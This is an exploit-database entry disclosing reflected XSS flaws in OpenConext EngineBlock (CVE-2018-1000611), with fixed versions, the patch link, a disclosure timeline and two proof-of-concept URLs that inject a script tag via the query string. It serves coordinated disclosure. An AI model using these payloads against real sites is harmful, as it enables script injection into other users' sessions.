Exploit for php platform in category web applications
XSS vulnerabilities were found in multiple pages that allows an attacker to
inject arbitrary web scripts.
The Twig PHP extension configuration was not sanitizing user input before
display it to the user.
Issues fixed in version 5.7.4 and 5.8.0. Git commit here:
https://github.com/OpenConext/OpenConext-engineblock/pull/566
PoC URLs:
https://engine.example.org/authentication/idp/help-discover?%22%3E%3Cscript%3Ealert(%27XSS%27)%3C/script%3E
https://engine.example.org/authentication/idp/single-sign-on?%22%3E%3Cscript%3Ealert(%27XSS%27)%3C/script%3E
CVE assigned: CVE-2018-1000611
Timeline:
- - - 2018-06-29: Notified SURFnet about the vulnerability
- - - 2018-07-04: Patch pull request created on Github
- - - 2018-07-04: CVE Requested
- - - 2018-07-05: Patch was merged on Github
- - - 2018-07-12: Announcing on Full Disclosure
# 0day.today [2018-07-13] #